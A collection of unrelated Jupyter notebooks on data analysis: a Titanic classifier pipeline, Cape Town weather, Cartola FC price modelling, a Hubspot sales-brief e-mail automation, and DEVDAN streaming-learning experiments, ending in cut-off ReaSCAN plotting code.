# -----
dataset_name = "Titanic Data"
pipeline_name = "Titanic Pipeline"
# -----
# -----
notebook_mode = True
```
## Clean out segment space
```
remove_unconnected_pipeline_segments()
```
# Import dataset
```
df = pd.read_csv(dataset_path)
shape_df = pd.DataFrame.from_dict({'Rows': [df.shape[0]],
'Columns': [df.shape[1]]})
display(shape_df)
display(df.head(30))
data_types_table(df)
```
# Loading and init df_features
```
# Option: 1
# df_features = get_type_holder_from_pipeline(pipeline_name)
# Option: 2
df_features = DataFrameTypes()
df_features.init_on_json_file(os.getcwd() + f"/eflow Data/{dataset_name}/df_features.json")
df_features.display_features(display_dataframes=True,
notebook_mode=notebook_mode)
```
# Any extra processing before eflow DataPipeline
# Setup pipeline structure
### Interaction Required
```
main_pipe = DataPipeline(pipeline_name,
df,
df_features)
main_pipe.perform_pipeline(df,
df_features)
df
```
# Seperate out data into train and test sets
```
# Split features/target into stratified train and test sets.
X = df.drop(columns=df_features.target_feature()).values
y = df[df_features.target_feature()].values
# NOTE(review): test_size=0.80 leaves only 20% of the data for *training* —
# confirm this is intentional and not a swapped train/test proportion.
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.80, random_state=517, stratify=y,
)
```
# Fit Models and view results
```
# Find best parameters for model
param_grid = {
"max_depth": list(range(1, 4)),
# "min_samples_leaf": list(range(80, 130, 5)),
# "criterion": ["gini", "entropy"],
# "n_splits": [20, 30]
}
model, best_params = optimize_model_grid(
model=DecisionTreeClassifier(),
X_train=X_train,
y_train=y_train,
param_grid=param_grid,
scoring="f1_micro"
)
model_name = repr(model).split("(")[0]
dt_model_analysis = ClassificationAnalysis(dataset_name=dataset_name,
model=model,
model_name=model_name,
target_feature=df_features.target_feature(),
pred_funcs_dict={"Probabilities function":model.predict_proba,
"Predict function":model.predict},
sample_data=X_train[0],
project_sub_dir='Classification Analysis',
notebook_mode=notebook_mode,
df_features=df_features)
dt_model_analysis.perform_analysis(X=X_train,
y=y_train,
dataset_name="Train Data",
thresholds_matrix=[[.0,.0],],
display_visuals=True)
dt_model_analysis.perform_analysis(X=X_test,
y=y_test,
dataset_name="Test Data",
display_visuals=True)
```
| github_jupyter |
I visited Cape Town in 2018. It was my first international trip, so the city remains special to me. I would love to go back there one day. Inspired by this, I chose to do a brief weather analysis on it to find the best time to visit. I cannot wait to have a taste of the fine Stellenbosch wine!
The goal here is to have fun, sooo remember this next line of code!!
```
pip install emoji
```
# Getting Data
I got the data from http://www.wunderground.com/history and downloaded it to my local PC as a CSV file.
```
import pandas as pd
df = pd.read_csv ("C:\\Users\\hp\\Documents\\Downloads\\Data Analysis-Pandas\\Data Analysis-Pandas-2\\CapeTown_CPT_2014.csv")
#lets check the data to see if we got it right
df.head()
```
Perfect! If you want to see a certain number of rows, you can pass the number to df.head(), but otherwise it gives 5 by default.
# Cleaning the data
The next step will be refining our data. In some cases as a data scientist, you will be required to analyse data that you were not involved in collecting and, as a result, there may be many unnecessary details in the data (this may also happen when you collect data yourself!). It is therefore key to clean your data and keep only what is important for you.
1. First we need to clean up the data. Let's rename the superfluous column name 'WindDirDegrees<br />' to 'WindDirDegrees'.
```
df = df.rename(columns = {'WindDirDegrees<br />' : 'WindDirDegrees'})
```
2. Remove the HTML tag <br/>
```
# NOTE(review): str.rstrip strips any trailing characters drawn from the set
# "<br />" (not the literal suffix); harmless for this column, but it would
# also eat trailing 'b', 'r', '<', '>', '/' or spaces in the data.
df['WindDirDegrees'] =df['WindDirDegrees'].str.rstrip('<br />')
df.dtypes
```
Change the value in the WindDirDegrees to float and the GMT to datetime
```
# Wind direction becomes numeric; the date column becomes a proper datetime64.
df['WindDirDegrees'] = df['WindDirDegrees'].astype('float64')
df['Date'] = pd.to_datetime(df['Date'])
#change default index to the datetime64 column so date-range .loc slicing works
df.index = df['Date']
```
Great. we are all set regarding our data types
# Finding a summer break
A quick wiki search says that summer in Cape Town runs from November to March. That's perfect timing because my birthday is in November!! (Doing a happy dance here.)
```
from datetime import datetime
# Slice the summer period using the datetime index set earlier.
summer = df.loc[datetime(2014,1,1) : datetime(2014,3,16)]
# Let's find the super warm days so we know when to hit the beach!
summer[summer['Mean TemperatureC'] >= 25]
%matplotlib inline
# Let's visualize this in a line graph
summer['Mean TemperatureC'].plot(grid=True, figsize=(10,5),legend= "top left")
```
Looks like we have fairly warm days distributed throughout the whole period. Let's check for rainy days as well. From what I remember, morning showers were a common thing in Cape Town.
```
summer[['Mean TemperatureC', 'Precipitationmm']].plot(grid=True, figsize=(10,5))
```
GREAT! looks like we only have a few rainy days in the beginning of the year. We could spend those snuggled up in bed with a bestseller. Have you read "Going Home" by Yaa Gyasi? NO? Buy that book and thank me later!
Conclusion
The weather in Cape Town looks friendly throughout summer. Some days in January are quite cold with rain, so if you're totally avoiding winter weather, avoid January and plan your trip for February, when it's all sun and no rain.
Finally, have fun in Madiba Land.
| github_jupyter |
# Descobrindo o algoritmo de valorização do Cartola FC - Parte I
## Explorando o algoritmo de valorização do Cartola.
Olá! Este é o primeiro tutorial da série que tentará descobrir o algoritmo de valorização do Cartola FC. Neste primeiro estudo, nós iremos:
1. Avaliar o sistema de valorizção ao longo das rodadas;
2. Estudar a distribuição a variação para cada rodada;
3. Realizar um estudo de caso com um jogador específico, estudando sua valorização e criando um modelo específico de valorização para o jogador.
Além disso, você estudará análise de dados usando Python com Pandas, Seaborn, Sklearn. Espero que você tenha noção sobre:
* Modelos lineares
* Análise de séries temporais
* Conhecimentos básicos do Cartola FC.
```
# Import libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import linear_model
from sklearn.metrics import mean_squared_error, r2_score
pd.options.mode.chained_assignment = None  # default='warn'
# Open the dataset (Cartola FC 2018 player-valuation data)
dados = pd.read_csv('~/caRtola/data/desafio_valorizacao/valorizacao_cartola_2018.csv')
# List the variable names
str(list(dados))
# Select the variables used in the analysis
dados = dados[['slug', 'rodada', 'posicao',
               'status', 'variacao_preco', 'pontos',
               'preco', 'media_pontos']]
# Explore the data of a single player (Lucas Paqueta)
paqueta = dados[dados.slug == 'lucas-paqueta']
paqueta.head(n=15)
```
Algumas observações sobre a estrutura dos dados. Na linha '21136', Paquetá está como dúvida é teve pontuação de 0. Na linha abaixo ('21137'), ele está suspenso, no entanto pontuou.
A explicação para este erro nos dados está ligada em como os dados da API da Globo são organizados. Embora para o front-end do Cartola os dados estejam corretos, para nossa análise eles são inadequados. Por quê?
Vamos pensar que você está escalando para a rodada 38. Para esta rodada, a pontuação do jogador ainda não está disponível, somente a variação do seu preço, sua média e seu preço _até_ a rodada 38. Assim, precisamos ajustar a coluna 'pontos', usando uma técnica simples de deslocar (lag) os dados da coluna. Além disso, precisaremos aplicar o mesmo processo na coluna 'variacao_preco' que também está ligada aos dados da rodada anterior.
Assim, a coluna 'variacao_preco' e 'pontos' estão deslocadas para cima e precisam ser corrigidas;
```
# Create lagged columns so each row's points / price change refer to the round just played
paqueta['variacao_preco_lag'] = paqueta['variacao_preco'].shift(1)
paqueta['pontos_lag'] = paqueta['pontos'].shift(1)
# NOTE(review): media is shifted by -1 (a lead, not a lag), unlike the two
# columns above — confirm this asymmetry is intentional.
paqueta['media_lag'] = paqueta['media_pontos'].shift(-1)
paqueta[['slug', 'rodada', 'status',
         'pontos_lag', 'variacao_preco_lag',
         'preco', 'media_pontos']].head(n=15)
```
Como podemos observar na tabela acima, os novos atributos que criamos agora estão alinhados com o status do atleta e poderão nos ajudar na etapa da modelagem. Antes de modelar, vamos explorar ainda nossos dados.
Primeira, observação para entendermos o modelo. O jogador quando está suspenso (linha 21137) ou seu status é nulo, não houve variação de preço. Há também outro ponto a ser observado, caso a pontuação do atleta seja positiva, há uma tendência de valorização. Vamos analisar isso nos dois gráficos abaixo.
```
# Reshape (melt) the data to long format for plotting
paqueta_plot = pd.melt(paqueta,
                       id_vars=['slug','rodada'],
                       value_vars=['variacao_preco_lag', 'pontos_lag', 'preco'])
# Plot price variation, lagged points and price across rounds
plt.figure(figsize=(16, 6))
g = sns.lineplot(x='rodada', y='value', hue='variable', data=paqueta_plot)
```
Neste gráfico, podemos observar que o preço do atleta foi razoavelmente estável ao longo do tempo. Ao observar o comportamento das linhas azul e laranja, conseguimos notar que quando uma linha tem inclinação negativa a outra parece acompanhar. Isso nos leva a concluir o óbvio, a pontuação do atleta está ligada diretamente a sua variação de preço.
```
plt.figure(figsize=(16, 6))
g = sns.scatterplot(x='pontos_lag', y='variacao_preco_lag', hue='status', data=paqueta)
```
Opa, aparentemente há uma relação entre os pontos e a variação do preço. Vamos analisar a matriz de correlação.
```
paqueta[['pontos_lag','variacao_preco_lag','preco','media_pontos']].corr()
```
Temos algumas informações uteis que saíram da matriz de correlação. Primeira, a pontuação está correlacionada positivamente com a variação e o preço do atleta negativamente correlacionada. Estas duas variáveis já podem nos ajudar a montar um modelo.
```
# Set predictors and dependent variable.
# Keep only rounds where the player could actually be re-priced (status not
# Nulo/Suspenso), skip the first 5 rounds, then drop rows with missing lags.
paqueta_complete = paqueta[(~paqueta.status.isin(['Nulo', 'Suspenso'])) & (paqueta.rodada > 5)]
paqueta_complete = paqueta_complete.dropna()
predictors = paqueta_complete[['pontos_lag','preco','media_lag']]
outcome = paqueta_complete['variacao_preco_lag']
# Ordinary least squares: price variation ~ lagged points + price + average
regr = linear_model.LinearRegression()
regr.fit(predictors, outcome)
# In-sample predictions (evaluated on the same data the model was fit to)
paqueta_complete['predictions'] = regr.predict(paqueta_complete[['pontos_lag', 'preco', 'media_lag']])
print('Intercept: \n', regr.intercept_)
print('Coefficients: \n', regr.coef_)
print("Mean squared error: %.2f"
      % mean_squared_error(paqueta_complete['variacao_preco_lag'], paqueta_complete['predictions']))
print('Variance score: %.2f' % r2_score(paqueta_complete['variacao_preco_lag'], paqueta_complete['predictions']))
```
Boa notícia! Nós estamos prevendo os resultados do jogador muito bem. O valor é aproximado, mas nada mal! A fórmula de valorização do jogador para uma dada rodada é:
$$ Variacao = 16.12 + (pontos * 0,174) - (preco * 0,824) + (media * 0,108) $$
Vamos abaixo em que medida nossas predições são compatíveis com o desempenho do jogador.
```
# Plot the actual price variation against the linear model's predicted values.
plt.figure(figsize=(8, 8))
g = sns.regplot(x='predictions', y='variacao_preco_lag', data=paqueta_complete)
# Annotate each point with its round number to spot rounds the model misses.
for line in range(0, paqueta_complete.shape[0]):
    g.text(paqueta_complete.iloc[line]['predictions'],
           paqueta_complete.iloc[line]['variacao_preco_lag']-0.25,
           paqueta_complete.iloc[line]['rodada'],
           horizontalalignment='right',
           size='medium',
           color='black',
           weight='semibold')
```
Nossa previsão para o jogador Paquetá estão muito boas. Não descobrimos o algoritmo do Cartola, mas já temos uma aproximação acima do razoável. Será que nosso modelo é generalizável aos outros jogadores?
Acompanhe nossa próxima publicação...
| github_jupyter |
<img width="10%" alt="Naas" src="https://landen.imgix.net/jtci2pxwjczr/assets/5ice39g4.png?w=160"/>
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/3f/HubSpot_Logo.svg/220px-HubSpot_Logo.svg.png" alt="drawing" width="200" align='left'/>
# Hubspot - Send sales brief
<a href="https://app.naas.ai/user-redirect/naas/downloader?url=https://raw.githubusercontent.com/jupyter-naas/awesome-notebooks/master/Hubspot/Hubspot_send_sales_brief.ipynb" target="_parent"><img src="https://img.shields.io/badge/-Open%20in%20Naas-success?labelColor=000000&logo=data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPHN2ZyB3aWR0aD0iMTAyNHB4IiBoZWlnaHQ9IjEwMjRweCIgdmlld0JveD0iMCAwIDEwMjQgMTAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayIgdmVyc2lvbj0iMS4xIj4KIDwhLS0gR2VuZXJhdGVkIGJ5IFBpeGVsbWF0b3IgUHJvIDIuMC41IC0tPgogPGRlZnM+CiAgPHRleHQgaWQ9InN0cmluZyIgdHJhbnNmb3JtPSJtYXRyaXgoMS4wIDAuMCAwLjAgMS4wIDIyOC4wIDU0LjUpIiBmb250LWZhbWlseT0iQ29tZm9ydGFhLVJlZ3VsYXIsIENvbWZvcnRhYSIgZm9udC1zaXplPSI4MDAiIHRleHQtZGVjb3JhdGlvbj0ibm9uZSIgZmlsbD0iI2ZmZmZmZiIgeD0iMS4xOTk5OTk5OTk5OTk5ODg2IiB5PSI3MDUuMCI+bjwvdGV4dD4KIDwvZGVmcz4KIDx1c2UgaWQ9Im4iIHhsaW5rOmhyZWY9IiNzdHJpbmciLz4KPC9zdmc+Cg=="/></a>
## Input
### Import library
```
from naas_drivers import emailbuilder, hubspot
import naas
import pandas as pd
from datetime import datetime
```
### Enter your Hubspot api key
```
# Hubspot API key placeholder — replace before running.
auth_token = 'YOUR_HUBSPOT_API_KEY'
```
### Connect to Hubspot
```
# Authenticated Hubspot client used by all API calls below.
hs = hubspot.connect(auth_token)
```
### Email parameters
```
# Receivers of the sales brief.
email_to = ["your_email_address"]  # fixed placeholder typo ("adresse" -> "address")
# Email subject, stamped with today's date (dd/mm/yyyy).
email_subject = f"🚀 Hubspot - Sales Brief as of {datetime.now().strftime('%d/%m/%Y')} (Draft)"
```
### Sales target
```
# Yearly sales target in euros; used for the completion KPIs below.
objective = 300000
```
### Pick your pipeline
#### Get all pipelines
```
# Fetch every pipeline (with its dealstages) to pick one below.
df_pipelines = hs.pipelines.get_all()
df_pipelines
```
#### Enter your pipeline id
```
# Pipeline chosen from the table above.
pipeline_id = "8432671"
```
### Constants
```
# Static assets and formats used when building the e-mail.
HUBSPOT_CARD = "https://lib.umso.co/lib_sluGpRGQOLtkyEpz/na1lz0v9ejyurau2.png?w=1200&h=900&fit=max&dpr=2"
NAAS_WEBSITE = "https://www.naas.ai"
EMAIL_DESCRIPTION = "Your sales brief"
DATE_FORMAT = "%Y-%m-%d"
```
### Schedule automation
```
# Re-run this notebook every Monday at 08:00 (standard cron syntax).
naas.scheduler.add(cron="0 8 * * 1")
```
### Get dealstages from pipeline
```
# Restrict the pipelines table to the dealstages of the chosen pipeline.
df_dealstages = df_pipelines.copy()
# Filter on pipeline
df_dealstages = df_dealstages[df_dealstages.pipeline_id == pipeline_id]
df_dealstages
```
### Get deals from pipeline
```
# Deal properties to request from the Hubspot deals API.
properties = [
"hs_object_id",
"dealname",
"dealstage",
"pipeline",
"createdate",
"hs_lastmodifieddate",
"closedate",
"amount"
]
df_deals = hs.deals.get_all(properties)
# Filter on pipeline
# Keep only deals that belong to the selected pipeline.
df_deals = df_deals[df_deals.pipeline == pipeline_id].reset_index(drop=True)
df_deals
```
## Model
### Formatting functions
```
def format_number(num):
    """Format *num* as a euro amount with space thousand separators, e.g. 1234 -> '1 234 €'."""
    return "{:,.0f} €".format(num).replace(",", " ")

def format_pourcentage(num):
    """Format a ratio as a whole percentage, e.g. 0.25 -> '25%'."""
    return "{:,.0%}".format(num)

def format_varv(num):
    """Format *num* as a '+'-prefixed euro variation, e.g. 500 -> '+500 €'."""
    return "+{:,.0f} €".format(num).replace(",", " ")
```
### Create sales pipeline database
```
# Join each deal with its dealstage metadata (label, probability, display order).
df_sales = pd.merge(df_deals.drop("pipeline", axis=1),
df_dealstages.drop(["pipeline", "pipeline_id", "createdAt", "updatedAt", "archived"], axis=1),
left_on="dealstage",
right_on="dealstage_id",
how="left")
df_sales
df_sales_c = df_sales.copy()
# Cleaning
# Missing or empty-string amounts become "0" so the float cast below succeeds.
df_sales_c["amount"] = df_sales_c["amount"].fillna("0")
df_sales_c.loc[df_sales_c["amount"] == "", "amount"] = "0"
# Formatting
df_sales_c["amount"] = df_sales_c["amount"].astype(float)
df_sales_c["probability"] = df_sales_c["probability"].astype(float)
df_sales_c.createdate = pd.to_datetime(df_sales_c.createdate)
df_sales_c.hs_lastmodifieddate = pd.to_datetime(df_sales_c.hs_lastmodifieddate)
df_sales_c.closedate = pd.to_datetime(df_sales_c.closedate)
# Calc
# Forecasted revenue per deal = amount weighted by its stage win probability.
df_sales_c["forecasted"] = df_sales_c["amount"] * df_sales_c["probability"]
df_sales_c
```
### Create sales pipeline agregated by dealstages
```
df_details = df_sales_c.copy()
# Groupby
# Aggregate per stage: total amount, number of deals, weighted forecast.
to_group = [
"dealstage_label",
"probability",
"displayOrder"
]
to_agg = {
"amount": "sum",
"dealname": "count",
"forecasted": "sum"
}
df_details = df_details.groupby(to_group, as_index=False).agg(to_agg)
# Sort
# Order the stages as they appear in the Hubspot pipeline.
df_details = df_details.sort_values("displayOrder")
df_details
```
### Calculate email parameters
```
# Total forecast = sum of stage amounts weighted by win probability.
forecasted = df_details.forecasted.sum()
forecasted
# Revenue already won (stages at probability == 1).
won = df_details[df_details["probability"] == 1].forecasted.sum()
won
# Weighted open pipeline (stages at probability < 1).
weighted = df_details[df_details["probability"] < 1].forecasted.sum()
weighted
# Share of the yearly objective covered by the forecast.
completion_p = forecasted / objective
completion_p
# Amount still missing to hit the objective.
completion_v = objective - forecasted
completion_v
today = datetime.now().strftime(DATE_FORMAT)
today
```
### Get pipeline details
```
df = df_details.copy()
details = []
# Build one HTML bullet per dealstage for the e-mail body.
for _, row in df.iterrows():
    # Stage label with its win probability, e.g. "Negotiation (60%)".
    detail = f"{row.dealstage_label} ({format_pourcentage(row.probability)})"
    if 0 < row.probability < 1:
        # Open stage: show raw amount, deal count and weighted amount.
        detail = (
            f"{detail}: <ul>"
            f"<li>Amount : {format_number(row.amount)}</li>"
            f"<li>Number : {row.dealname}</li>"
            f"<li>Weighted amount : <b>{format_number(row.forecasted)}</b></li></ul>"
        )
    else:
        # Won (p == 1) or lost (p == 0): just the amount.
        detail = f"{detail}: {format_number(row.amount)}"
    details.append(detail)
details
```
### Get inactives deals
```
df_inactive = df_sales_c.copy()
# Normalise last-modified to date precision, then compute days since last activity.
df_inactive.hs_lastmodifieddate = pd.to_datetime(df_inactive.hs_lastmodifieddate).dt.strftime(DATE_FORMAT)
df_inactive["inactive_time"] = (datetime.now() - pd.to_datetime(df_inactive.hs_lastmodifieddate, format=DATE_FORMAT)).dt.days
# Create the column explicitly first so it exists whatever the mask selects;
# the original relied on a tuple-keyed masked .loc assignment alone.
df_inactive["inactive"] = None
df_inactive.loc[df_inactive["inactive_time"] > 30, "inactive"] = "inactive"
# Keep open, valued deals untouched for more than 30 days, biggest first.
df_inactive = df_inactive[(df_inactive.inactive == 'inactive') &
                          (df_inactive.amount != 0) &
                          (df_inactive.probability > 0.) &
                          (df_inactive.probability < 1)].sort_values("amount", ascending=False).reset_index(drop=True)
df_inactive
inactives = []
# Build the "needs action" bullet list from the 10 largest inactive deals.
for _, row in df_inactive[:10].iterrows():
    inactive = f"{row.dealname} ({row.dealstage_label}): <b>{format_number(row.amount)}</b>"
    inactives += [inactive]
inactives
```
### Create pipeline waterfall
```
import plotly.graph_objects as go
# Waterfall: Won + weighted Pipeline = Forecast; Missing fills up to Objective.
fig = go.Figure(go.Waterfall(name="20",
orientation = "v",
measure = ["relative", "relative", "total", "relative", "total"],
x = ["Won", "Pipeline", "Forecast", "Missing", "Objective"],
textposition = "outside",
text = [format_number(won), format_varv(weighted), format_number(forecasted), format_varv(completion_v), format_number(objective)],
y = [won, weighted, forecasted, completion_v, objective],
decreasing = {"marker":{"color":"#33475b"}},
increasing = {"marker":{"color":"#33475b"}},
totals = {"marker":{"color":"#ff7a59"}}
))
fig.update_layout(title = "Sales Metrics", plot_bgcolor="#ffffff", hovermode='x')
fig.update_yaxes(tickprefix="€", gridcolor='#eaeaea')
fig.show()
# Export the chart, then publish both files as naas assets so the e-mail
# can embed the image and link to the interactive HTML version.
fig.write_html("GRAPH_FILE.html")
fig.write_image("GRAPH_IMG.png")
params = {"inline": True}
graph_url = naas.asset.add("GRAPH_FILE.html", params=params)
graph_image = naas.asset.add("GRAPH_IMG.png")
```
### Create email
```
def email_brief(today,
forecasted,
won,
weighted,
objective,
completion_p,
completion_v,
details,
inactives
):
"""Assemble the HTML sales-brief e-mail from the precomputed KPIs.

Builds an ordered dict of emailbuilder sections (header image, KPI
overview, waterfall chart, pipeline details, action list, glossary)
and renders it with emailbuilder.generate. Reads the module-level
graph_image / graph_url assets and the NAAS_WEBSITE / HUBSPOT_CARD /
EMAIL_DESCRIPTION constants.
"""
content = {
'title': (f"<a href='{NAAS_WEBSITE}'>"
f"<img align='center' width='100%' target='_blank' style='border-radius:5px;'"
f"src='{HUBSPOT_CARD}' alt={EMAIL_DESCRIPTION}/>"
"</a>"),
'txt_intro': (f"Hi there,<br><br>"
f"Here is your weekly sales email as of {today}."),
'title_1': emailbuilder.text("Overview", font_size="27px", text_align="center", bold=True),
"text_1": emailbuilder.text(f"As of today, your yearly forecasted revenue is {format_number(forecasted)}."),
"list_1": emailbuilder.list([f"Won : {format_number(won)}",
f"Weighted pipeline : <b>{format_number(weighted)}</b>"]),
"text_1_2": emailbuilder.text(f"You need to find 👉 <u>{format_number(completion_v)}</u> to reach your goal !"),
"text_1_1": emailbuilder.text(f"Your yearly objective is {format_number(objective)} ({format_pourcentage(completion_p)} completion)."),
'image_1': emailbuilder.image(graph_image, link=graph_url),
'title_2': emailbuilder.text("🚀 Pipeline", font_size="27px", text_align="center", bold=True),
"list_2": emailbuilder.list(details),
'title_3': emailbuilder.text("🧐 Actions needed", font_size="27px", text_align="center", bold=True),
'text_3': emailbuilder.text("Here are deals where you need to take actions :"),
'list_3': emailbuilder.list(inactives),
'text_3_1': emailbuilder.text("If you need more details, connect to Hubspot with the link below."),
'button_1': emailbuilder.button(link="https://app.hubspot.com/",
text="Go to Hubspot",
background_color="#ff7a59"),
'title_4': emailbuilder.text("Glossary", text_align="center", bold=True, underline=True),
'list_4': emailbuilder.list(["Yearly forecasted revenue : Weighted amount + WON exclude LOST",
"Yearly objective : Input in script",
"Inactive deal : No activity for more than 30 days"]),
'footer_cs': emailbuilder.footer_company(naas=True),
}
email_content = emailbuilder.generate(display='iframe', **content)
return email_content
# Render the e-mail once with the KPIs computed above.
email_content = email_brief(today,
forecasted,
won,
weighted,
objective,
completion_p,
completion_v,
details,
inactives)
```
## Output
### Send email
```
# Send the generated brief to the configured recipients via naas.
naas.notification.send(email_to,
email_subject,
email_content)
```
| github_jupyter |
```
from DEVDANmainloop import DEVDANmain, DEVDANmainID
from DEVDANbasic import DEVDAN
from utilsDEVDAN import dataLoader, plotPerformance
import random
import numpy as np
import torch

# random seed control
np.random.seed(0)
torch.manual_seed(0)
random.seed(0)

# load data
dataStreams = dataLoader('../dataset/hepmass2.mat')

print('All Data')
allMetrics = []
# Five independent runs on fully labeled data; the original notebook
# repeated the init/train/plot cell verbatim five times.
for _ in range(5):
    DevdanNet = DEVDAN(dataStreams.nInput, dataStreams.nOutput)
    DevdanNet, performanceHistory, allPerformance = DEVDANmain(DevdanNet, dataStreams)
    allMetrics.append(allPerformance)
    plotPerformance(performanceHistory[0], performanceHistory[1], performanceHistory[2],
                    performanceHistory[3], performanceHistory[4])

# allPerformance indices:
# 0: accuracy, 1: f1_score, 2: precision_score, 3: recall_score,
# 4: training_time, 5: testingTime, 6: nHiddenLayer, 7: nHiddenNode
meanResults = np.round_(np.mean(allMetrics, 0), decimals=2)
stdResults = np.round_(np.std(allMetrics, 0), decimals=2)
print('\n')
print('========== Performance occupancy ==========')
print('Preq Accuracy: ', meanResults[0].item(), '(+/-)', stdResults[0].item())
print('F1 score: ', meanResults[1].item(), '(+/-)', stdResults[1].item())
print('Precision: ', meanResults[2].item(), '(+/-)', stdResults[2].item())
print('Recall: ', meanResults[3].item(), '(+/-)', stdResults[3].item())
print('Training time: ', meanResults[4].item(), '(+/-)', stdResults[4].item())
print('Testing time: ', meanResults[5].item(), '(+/-)', stdResults[5].item())
print('\n')
print('========== Network ==========')
print('Number of hidden layers: ', meanResults[6].item(), '(+/-)', stdResults[6].item())
print('Number of features: ', meanResults[7].item(), '(+/-)', stdResults[7].item())
### 50% Labeled Data
print('50% Data')
allMetrics = []
# Five independent runs with 50% labeled samples; the original notebook
# repeated the init/train/plot cell verbatim five times.
for _ in range(5):
    DevdanNet = DEVDAN(dataStreams.nInput, dataStreams.nOutput)
    DevdanNet, performanceHistory, allPerformance = DEVDANmain(DevdanNet, dataStreams,
                                                               labeled=False, nLabeled=0.5)
    allMetrics.append(allPerformance)
    plotPerformance(performanceHistory[0], performanceHistory[1], performanceHistory[2],
                    performanceHistory[3], performanceHistory[4])

# allPerformance indices: 0 accuracy, 1 f1, 2 precision, 3 recall,
# 4 training time, 5 testing time, 6 hidden layers, 7 hidden nodes.
meanResults = np.round_(np.mean(allMetrics, 0), decimals=2)
stdResults = np.round_(np.std(allMetrics, 0), decimals=2)
print('\n')
print('========== Performance occupancy ==========')
print('Preq Accuracy: ', meanResults[0].item(), '(+/-)', stdResults[0].item())
print('F1 score: ', meanResults[1].item(), '(+/-)', stdResults[1].item())
print('Precision: ', meanResults[2].item(), '(+/-)', stdResults[2].item())
print('Recall: ', meanResults[3].item(), '(+/-)', stdResults[3].item())
print('Training time: ', meanResults[4].item(), '(+/-)', stdResults[4].item())
print('Testing time: ', meanResults[5].item(), '(+/-)', stdResults[5].item())
print('\n')
print('========== Network ==========')
print('Number of hidden layers: ', meanResults[6].item(), '(+/-)', stdResults[6].item())
print('Number of features: ', meanResults[7].item(), '(+/-)', stdResults[7].item())
### 25% Labeled Data
print('25% Data')
allMetrics = []
# Five independent runs with 25% labeled samples; the original notebook
# repeated the init/train/plot cell verbatim five times.
for _ in range(5):
    DevdanNet = DEVDAN(dataStreams.nInput, dataStreams.nOutput)
    DevdanNet, performanceHistory, allPerformance = DEVDANmain(DevdanNet, dataStreams,
                                                               labeled=False, nLabeled=0.25)
    allMetrics.append(allPerformance)
    plotPerformance(performanceHistory[0], performanceHistory[1], performanceHistory[2],
                    performanceHistory[3], performanceHistory[4])

# allPerformance indices: 0 accuracy, 1 f1, 2 precision, 3 recall,
# 4 training time, 5 testing time, 6 hidden layers, 7 hidden nodes.
meanResults = np.round_(np.mean(allMetrics, 0), decimals=2)
stdResults = np.round_(np.std(allMetrics, 0), decimals=2)
print('\n')
print('========== Performance occupancy ==========')
print('Preq Accuracy: ', meanResults[0].item(), '(+/-)', stdResults[0].item())
print('F1 score: ', meanResults[1].item(), '(+/-)', stdResults[1].item())
print('Precision: ', meanResults[2].item(), '(+/-)', stdResults[2].item())
print('Recall: ', meanResults[3].item(), '(+/-)', stdResults[3].item())
print('Training time: ', meanResults[4].item(), '(+/-)', stdResults[4].item())
print('Testing time: ', meanResults[5].item(), '(+/-)', stdResults[5].item())
print('\n')
print('========== Network ==========')
print('Number of hidden layers: ', meanResults[6].item(), '(+/-)', stdResults[6].item())
print('Number of features: ', meanResults[7].item(), '(+/-)', stdResults[7].item())
### Infinite Delay
print('Infinite Delay')
allMetrics = []
# Five independent runs under the infinite-delay protocol (DEVDANmainID);
# the original notebook repeated the init/train/plot cell verbatim five times.
for _ in range(5):
    DevdanNet = DEVDAN(dataStreams.nInput, dataStreams.nOutput)
    DevdanNet, performanceHistory, allPerformance = DEVDANmainID(DevdanNet, dataStreams)
    allMetrics.append(allPerformance)
    plotPerformance(performanceHistory[0], performanceHistory[1], performanceHistory[2],
                    performanceHistory[3], performanceHistory[4])

# allPerformance indices: 0 accuracy, 1 f1, 2 precision, 3 recall,
# 4 training time, 5 testing time, 6 hidden layers, 7 hidden nodes.
meanResults = np.round_(np.mean(allMetrics, 0), decimals=2)
stdResults = np.round_(np.std(allMetrics, 0), decimals=2)
print('\n')
print('========== Performance occupancy ==========')
print('Preq Accuracy: ', meanResults[0].item(), '(+/-)', stdResults[0].item())
print('F1 score: ', meanResults[1].item(), '(+/-)', stdResults[1].item())
print('Precision: ', meanResults[2].item(), '(+/-)', stdResults[2].item())
print('Recall: ', meanResults[3].item(), '(+/-)', stdResults[3].item())
print('Training time: ', meanResults[4].item(), '(+/-)', stdResults[4].item())
print('Testing time: ', meanResults[5].item(), '(+/-)', stdResults[5].item())
print('\n')
print('========== Network ==========')
print('Number of hidden layers: ', meanResults[6].item(), '(+/-)', stdResults[6].item())
print('Number of features: ', meanResults[7].item(), '(+/-)', stdResults[7].item())
| github_jupyter |
```
import os
from typing import List
from typing import Tuple
import logging
FORMAT = "%(asctime)-15s %(message)s"
logging.basicConfig(format=FORMAT, level=logging.INFO,
datefmt="%Y-%m-%d %H:%M")
logger = logging.getLogger(__name__)
from collections import defaultdict
from collections import Counter
import json
import torch
import numpy as np
from xlwt import Workbook
import sys
sys.path.append(os.path.join(os.path.dirname("__file__"), '..', '..', 'dataset'))
from world import *
from vocabulary import Vocabulary as ReaSCANVocabulary
from object_vocabulary import *
import numpy as np
from typing import Tuple
from typing import List
from typing import Any
import matplotlib.pyplot as plt
def bar_plot(values: dict, title: str, save_path: str, errors={}, y_axis_label="Occurrence"):
    """Save a bar chart of *values* (label -> count), bars sorted by ascending value."""
    # Sort (value, label) pairs so bars appear in ascending order of value.
    pairs = sorted((count, label) for label, count in values.items())
    heights = [count for count, _ in pairs]
    labels = [label for _, label in pairs]
    # Align error bars with the sorted label order, if any were given.
    yerr = [errors[label] for _, label in pairs] if len(errors) > 0 else None
    assert len(labels) == len(heights)
    positions = np.arange(len(labels))
    plt.bar(positions, heights, yerr=yerr, align='center', alpha=0.5)
    plt.gcf().subplots_adjust(bottom=0.2, )
    plt.xticks(positions, labels, rotation=90, fontsize="xx-small")
    plt.ylabel(y_axis_label)
    plt.title(title)
    plt.savefig(save_path)
    plt.close()
def grouped_bar_plot(values: dict, group_one_key: Any, group_two_key: Any, title: str, save_path: str,
